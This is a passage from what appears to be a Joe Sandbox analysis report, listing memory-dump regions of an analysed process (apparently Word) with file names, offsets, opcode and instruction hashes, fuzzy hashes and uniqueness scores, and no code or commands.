                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8bbd9b2c7440c5d86495a00055fc20f86114183503c8dc95dffd925d04c1ae9d
                        • Instruction ID: 8a757a952509bd3309144eb80767d2683f080bd63accef62d3befc707f336188
                        • Opcode Fuzzy Hash: 8bbd9b2c7440c5d86495a00055fc20f86114183503c8dc95dffd925d04c1ae9d
                        • Instruction Fuzzy Hash: AE11CEF1A08204CFD704CF64D858BAE3BF2FB59314F2540A9D842AB2A0DB78AE41DF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522335190.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f00000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8baa77f0a823573bce3899b9ae55281c3021b4d3eebb30e190c74cbc1fc3b707
                        • Instruction ID: f6852c59a4e8130934f696d153fdbe94625a3c47a2ad266617a4fb8d5eeae79f
                        • Opcode Fuzzy Hash: 8baa77f0a823573bce3899b9ae55281c3021b4d3eebb30e190c74cbc1fc3b707
                        • Instruction Fuzzy Hash: 5D01F232B0E7918FCF36166568281263B71AB8367231980FBD446CB292CA248C57F751
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95f2851459eac0e3eae3e5601b3226dae534ef87915e999fbcf8861070421490
                        • Instruction ID: a6b7e28ca77937ac48107ac670dbe87b436fe88d2f1da0a0bacaf67b354f68e9
                        • Opcode Fuzzy Hash: 95f2851459eac0e3eae3e5601b3226dae534ef87915e999fbcf8861070421490
                        • Instruction Fuzzy Hash: 64018030E09244EFDB05DF68D941769BFB1EB85304F6080AADA05E7251EA346EA5EB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 013b0cc06fcee4ae801b6849b2374cfbd24a0d6312dfe970ac2db8f4068be8ee
                        • Instruction ID: 569230aaa8b965305f4f6f34666bf7e0cc7f81083c9d40576e28f02735321b65
                        • Opcode Fuzzy Hash: 013b0cc06fcee4ae801b6849b2374cfbd24a0d6312dfe970ac2db8f4068be8ee
                        • Instruction Fuzzy Hash: DFF028337093046FCB021A55AC4197F7F15E7D6390B14843AFE0587381DD615C16F761
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c1ca2efab997f23e3872d85346f560dc411c7d671f3164acc0d98ebf5bbfb60
                        • Instruction ID: 18226fcf65662cab36634ca7a4672823b68f4a7518f834c54e03831a115d6201
                        • Opcode Fuzzy Hash: 7c1ca2efab997f23e3872d85346f560dc411c7d671f3164acc0d98ebf5bbfb60
                        • Instruction Fuzzy Hash: 71115E70D4120ADFDB15CF94D548BEDBBB2FF45304F248555E801AB2A0DBB46E85DB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 900d69137aefb757d684ca8b3affab75a898b74f31afa9d7f85684d189db1430
                        • Instruction ID: f3a8c0f1cadd6807588e1e8e65da3c8264d87050c43827314312a8151e24167f
                        • Opcode Fuzzy Hash: 900d69137aefb757d684ca8b3affab75a898b74f31afa9d7f85684d189db1430
                        • Instruction Fuzzy Hash: AA016935E48208EFCB04EFA9D14569CBBF2FB84304F2084A9C84693350E7785B95EF41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 330e1c50f77aa6929ab8214df9c8630a64944c2b981dbf36fa8a78e51eccad10
                        • Instruction ID: e3fa8bfdf87d8bcf8388334d748992ed90c9e51efd4d2fee82267f82c72200a8
                        • Opcode Fuzzy Hash: 330e1c50f77aa6929ab8214df9c8630a64944c2b981dbf36fa8a78e51eccad10
                        • Instruction Fuzzy Hash: 36014B31E09604EFCB04DF69D945B6DBBB2FB84304F6084A9D906A7350EA306EA5EB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d94fce2e18ed8721291c5f63ea3076f5d7682a2122e2656de9ea27286db401eb
                        • Instruction ID: f2d68424e997b95331e87bedbb9b18863d434132071b2bf7ac100c1f64d3adaf
                        • Opcode Fuzzy Hash: d94fce2e18ed8721291c5f63ea3076f5d7682a2122e2656de9ea27286db401eb
                        • Instruction Fuzzy Hash: 57F0E9B6A08604AFD701DF50E58149DBBF5DBC4610F10449AE40597311EB329E179761
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a991b4ad8b07e09e1b3071d0cab7bf942a38b3dd6a35d33ad9a37decd490e85
                        • Instruction ID: 287671edbb7dc36271cf9d19750bb0c6a1093b0fa0fc9440a1b623aacc341c60
                        • Opcode Fuzzy Hash: 2a991b4ad8b07e09e1b3071d0cab7bf942a38b3dd6a35d33ad9a37decd490e85
                        • Instruction Fuzzy Hash: CDF05431F501458BDB24AFF5846637E75A25BC8718F204429C516EB394CFB84D019BE6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 13344a095db6b1e23a211ad0da0a022b5c4f11d3d12996216fe2da05ddfa6202
                        • Instruction ID: b5b89067aa00fb2779018e46f21d5357f75485ed680180ff4c886a31527806e2
                        • Opcode Fuzzy Hash: 13344a095db6b1e23a211ad0da0a022b5c4f11d3d12996216fe2da05ddfa6202
                        • Instruction Fuzzy Hash: F5F0B471F4C4904FDB19DB14D4656E6BF60EFA6310F0881D5DC998B383C666DC52DB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e18cb8af5ab4e367719dc99dc1e4767b5babaa2901876598f8f0e7a2aee04cb
                        • Instruction ID: b1b6cb207670fb8264194d76053a710f3257fe73be3c5efb9d31c499f2df3413
                        • Opcode Fuzzy Hash: 2e18cb8af5ab4e367719dc99dc1e4767b5babaa2901876598f8f0e7a2aee04cb
                        • Instruction Fuzzy Hash: B4F03C30A04508CFDB40EFA8D950A9EB7B2FB89304F108625E546A7354EF34A9999B51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ffe897c23864de5de2630806f8cc99c1a3405d1af63226a374aa1c86a1499c1
                        • Instruction ID: b43eddd6cd5d07abb01a0ca438a51174fde2735542bb842ca5f969c2d5eeb748
                        • Opcode Fuzzy Hash: 4ffe897c23864de5de2630806f8cc99c1a3405d1af63226a374aa1c86a1499c1
                        • Instruction Fuzzy Hash: BFF0827260E3E05FC7438B18C8615997F70AF97304B1A84DBD480CB5A3C6218C1AC7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b363ed19671082678d2406daa12e8da202136a83d4fb94970b54718ec534615b
                        • Instruction ID: 03510a34caf4d282b1fb64db24a23864b09f164cc757768acbf28c3bd9a2ae9b
                        • Opcode Fuzzy Hash: b363ed19671082678d2406daa12e8da202136a83d4fb94970b54718ec534615b
                        • Instruction Fuzzy Hash: 8AF0BE32E06108AFCB158E48E840AAA7B76EB99360F144026FC05A3390CE758CA2EB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: faa4d4c712b079de9c99e522c1cb7ad863d217b161fcce8c9bafb9b083e209b1
                        • Instruction ID: 1cd3d558bee667ddcea3f513c064771ad61bd773a1c1407e41333732b35cc022
                        • Opcode Fuzzy Hash: faa4d4c712b079de9c99e522c1cb7ad863d217b161fcce8c9bafb9b083e209b1
                        • Instruction Fuzzy Hash: 4BF0E53270C2946FCB036758AC2496B7FA9DBC6321F04846FF181C7292C9658C1693A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a029ed7a0341831efa8352283b7a948e88b9d26475fab8699a946f0c2002c6f6
                        • Instruction ID: c794788da3931a9f411f6a4fc4b402e78538abcc11111526b52863917120beaa
                        • Opcode Fuzzy Hash: a029ed7a0341831efa8352283b7a948e88b9d26475fab8699a946f0c2002c6f6
                        • Instruction Fuzzy Hash: 73E012721481A82EC716CA999C508B67FEC595E2117098097F994C6293C565ED029772
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5420abbc6bd0658e6c9730c06bb5b783b116166d9b4700ea463a3325dd6877e4
                        • Instruction ID: 69e4dcd3264a8e00757f0f5308500361e1c9bea8c10ec2e9b06fa7cb83c3cbfa
                        • Opcode Fuzzy Hash: 5420abbc6bd0658e6c9730c06bb5b783b116166d9b4700ea463a3325dd6877e4
                        • Instruction Fuzzy Hash: 27E0C2327082246B0614265A788493FBA9FE7CA775329453AFE0993740DD616C1167E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 72a511489e48c6589ee8b2cfab70c3f9ae05b5457d72e969292cd0a0bc1121c5
                        • Instruction ID: 5c57ed623efabe570540d0a8ac2c09816f47912fd9a118b7b1e9c6e1ad5e9a34
                        • Opcode Fuzzy Hash: 72a511489e48c6589ee8b2cfab70c3f9ae05b5457d72e969292cd0a0bc1121c5
                        • Instruction Fuzzy Hash: D5E09232505258AFCB028F84DC01CB67F79EB6A350704C08BFD05872A2CA72DC23E7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 287ea5b72e1e7d4366387057a9c729720f759d804ba35021281d77855abf3bd1
                        • Instruction ID: 053333d8d048c459c579b2d7426e0f54e6aaca4f366164c712f84a1d572b9bf4
                        • Opcode Fuzzy Hash: 287ea5b72e1e7d4366387057a9c729720f759d804ba35021281d77855abf3bd1
                        • Instruction Fuzzy Hash: 77E086312092587FCB02CE54DC518B57F79EF8A220705C09BFD89CB262C6B2AC13D7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a30d77ed1f96b7af8aafd42ab13ec231dffdf6bbad45c69171c22d6b85f5da3
                        • Instruction ID: 155e50e781663d3f558273e26ebfe847f9ab2ed6f7b723c29598e799a3408b26
                        • Opcode Fuzzy Hash: 2a30d77ed1f96b7af8aafd42ab13ec231dffdf6bbad45c69171c22d6b85f5da3
                        • Instruction Fuzzy Hash: 42D0A972D0900CEB4B00EFA0D5011AEBBB9DB01204B2005E6E60A9B210EF328B106BD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 498005f689d9ec831dce3a6dae13965d16f21d377460ba9a2f484f2ab6d7340c
                        • Instruction ID: d47d7f5a76146d115ee07020c981f081d3ef0e066457bb02e7f10f953acda958
                        • Opcode Fuzzy Hash: 498005f689d9ec831dce3a6dae13965d16f21d377460ba9a2f484f2ab6d7340c
                        • Instruction Fuzzy Hash: F9D0A972D0810CEB4B00EFA0C9015AEBBFDDB01204B2005E6E60697210EF32AB106BE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3c5e8f954396ef584adcb4b3ff4293cd01c40bd42de0376ee783eaeea65d9262
                        • Instruction ID: 1286d7c21d744c966cc315fcf06bedf000bedecdbf470fd8682964fafd093cc3
                        • Opcode Fuzzy Hash: 3c5e8f954396ef584adcb4b3ff4293cd01c40bd42de0376ee783eaeea65d9262
                        • Instruction Fuzzy Hash: F7D05EB26083409FD355DB04C89097AB7A1EBE8300F14885EE59243351CA639C17CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7649c4b73c1cbb73b992ac9a3f2632df15983552668c0a9e70291632b965f566
                        • Instruction ID: 3cd112ac78a9f0e8a883532ad3bab0a4b5bca49bb10de5048ee305622b02d73c
                        • Opcode Fuzzy Hash: 7649c4b73c1cbb73b992ac9a3f2632df15983552668c0a9e70291632b965f566
                        • Instruction Fuzzy Hash: 22D0A972D0850CFF4B00EFA4C9018AEB7FCDB02208B1085EAD60697210EE32AB2067E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cc719e4e82ca4be04d17574c2b2bc3a7ee0cc829f2b1df1994ad7585df1ee821
                        • Instruction ID: 4fb192cd099d5e243385f391775086f4824e06d7aa83c9bbda8eb9ebb0d28b21
                        • Opcode Fuzzy Hash: cc719e4e82ca4be04d17574c2b2bc3a7ee0cc829f2b1df1994ad7585df1ee821
                        • Instruction Fuzzy Hash: 88D0A972A0810CEB4B00EFE4E98149EB7FEEB40200F1005E6DA06D7210EE32AB10AB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 132e204ad1f50e8cea2bcaa99808d4b9b4732fcfa16f014561b5189aad594e2c
                        • Instruction ID: 7d39c31319db02f4b01534f7b8ce1cb6178e330f569a484bbfb3dc01341c5275
                        • Opcode Fuzzy Hash: 132e204ad1f50e8cea2bcaa99808d4b9b4732fcfa16f014561b5189aad594e2c
                        • Instruction Fuzzy Hash: 01D05E7410C3809FC345DB14CC5486ABB61FFD5320B158D8EE8B0872D6CB218847CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ec6abda554238043cb1d2d28463e0714b6cbebb66b77fcdd9c49b42d0806e7c
                        • Instruction ID: 02c62b6a3b38f965aebdcef835c2089248dd289051cbe229c37c90b206b865ae
                        • Opcode Fuzzy Hash: 5ec6abda554238043cb1d2d28463e0714b6cbebb66b77fcdd9c49b42d0806e7c
                        • Instruction Fuzzy Hash: DAD05B715083515FD305DA14D8D0456B751EBD562471485CFDDA0573A2D6519C07C750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ddc6f976ba370eccf1e0341d36bd40de7f92d3405b1022222df074ad7f8e16b
                        • Instruction ID: f60a0c828f943c248fc374281974a697f8fb50ce0f07789e85547e02b46d3eab
                        • Opcode Fuzzy Hash: 9ddc6f976ba370eccf1e0341d36bd40de7f92d3405b1022222df074ad7f8e16b
                        • Instruction Fuzzy Hash: 19D067356082809FC305CB19C865815FBF59F96211729C8AEE489CB262D6319843D711
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1557b3096f5549f6873ca8ac1cca56595c580b1082ba2b4e2f2b1d6ab691ded8
                        • Instruction ID: c0cb13832f7d83fe505282d696296f05ff0229d3c1a969c0e772b66e44947037
                        • Opcode Fuzzy Hash: 1557b3096f5549f6873ca8ac1cca56595c580b1082ba2b4e2f2b1d6ab691ded8
                        • Instruction Fuzzy Hash: 86D05EB2308381AFC302CB08C860866BB61FFD5300B048C9FF88187266CB26EC16CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5c3e0af1f3ee5c8b06aad8975cfcf266f63d6187842d0a4014a831ba703f9f3d
                        • Instruction ID: 3e0617986de5cf790a87249a28f7e45c8718aef6ceeca8e75e55a247d945f5a2
                        • Opcode Fuzzy Hash: 5c3e0af1f3ee5c8b06aad8975cfcf266f63d6187842d0a4014a831ba703f9f3d
                        • Instruction Fuzzy Hash: 30D0C9757092405FD315C624C8E1886BBA2AFDA324725C4EED449C73A6DA39DD47C611
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9361a77d09aea8fd69af2be6012f7590b9f6f34b8363b6069a5c49a567268190
                        • Instruction ID: 783b6faf7c6948e658ce9ed8f04930c3674bdbe08c7831fb3ee16552aa1d592f
                        • Opcode Fuzzy Hash: 9361a77d09aea8fd69af2be6012f7590b9f6f34b8363b6069a5c49a567268190
                        • Instruction Fuzzy Hash: 36D0A930A466208FC304AA08F009AA533D9EB84324F4400B6E80A8B750DB682C90CA84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6e5fec77aa167ec3623ee88abcab07c700e3847675508655964f9baad6190aa5
                        • Instruction ID: b394431afec180458b2f17e403b7c84aa4127660e3384dd999cd3e5a13e17047
                        • Opcode Fuzzy Hash: 6e5fec77aa167ec3623ee88abcab07c700e3847675508655964f9baad6190aa5
                        • Instruction Fuzzy Hash: 27D0A7B01092406FC341EF20C459405BFA1FF97380F5A84DEC485CB167DA334907C710
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15ca3732128a0491c5e4d2df48a3939ded9c1ffe77f2fd0f6ed224a58fcf511a
                        • Instruction ID: b0bcd0d818028fb86286ebd76ad6591a98516ee50685fa3ea6fdf9a60ab44054
                        • Opcode Fuzzy Hash: 15ca3732128a0491c5e4d2df48a3939ded9c1ffe77f2fd0f6ed224a58fcf511a
                        • Instruction Fuzzy Hash: 94D0A772208211AF9240CF04E940C3BF7F6DBD4B00B04C84EB881D3310CA62DD16CB72
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c73bf2ba2eafa7557797446368059ceb0e1aa2e970bd45a4be0b42d31550924
                        • Instruction ID: d6a589a957e633b2ad1bf500c770d151988b8dc1e9d7190228fea4b897985f06
                        • Opcode Fuzzy Hash: 2c73bf2ba2eafa7557797446368059ceb0e1aa2e970bd45a4be0b42d31550924
                        • Instruction Fuzzy Hash: 12D0177010A3815FC312C720C869A12BFB55F86214F2888EED489CB2A3DA36A806CB16
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cbfd95dfbdf33bece5a37b1fdbb0948b898c96b2c98195f82341cf91517b31eb
                        • Instruction ID: daa64e60b5134ffeef0890b00be93dfc2d149ef6594588866e2540ec1b96112f
                        • Opcode Fuzzy Hash: cbfd95dfbdf33bece5a37b1fdbb0948b898c96b2c98195f82341cf91517b31eb
                        • Instruction Fuzzy Hash: ABD09E711157409FC3519F20C859806FFB0EF97340B9AC8AEC486CB1A6DA354907DB15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 791868b2b6d4904eca63423b42afb3773cf3bd7afed7f015f908fe64dc81cf6d
                        • Instruction ID: 1d2c5b51030abd186a83bee4b09449a282c16bbf154cb9b97365610c327b5c4c
                        • Opcode Fuzzy Hash: 791868b2b6d4904eca63423b42afb3773cf3bd7afed7f015f908fe64dc81cf6d
                        • Instruction Fuzzy Hash: B8D0C9712081219F9244CA48E950C6BB7E9DBC9A10B14884EB88493241CA62DC16CBB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                        • Instruction ID: bcf9ef9c82f7d3924de405cb1b01dc34d2668a849c410a3a4cb9bba8efa29a2e
                        • Opcode Fuzzy Hash: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                        • Instruction Fuzzy Hash: 91C012712082605F8244DA48C850C67F7E9AFCD110718C84FB494C3341CA61DC07C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bc965a8a84a01070074ba96cac20fef8f448fc434c361908372ff584ead7715d
                        • Instruction ID: de44283e7c7546d74c1f8c2003c370184b09e40a0de692e63acec97384c2819c
                        • Opcode Fuzzy Hash: bc965a8a84a01070074ba96cac20fef8f448fc434c361908372ff584ead7715d
                        • Instruction Fuzzy Hash: 5BD0123020E3C09FC3038B24C821418BF708E8720931988CFD8C5CB2A7CE2AA80AD792
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
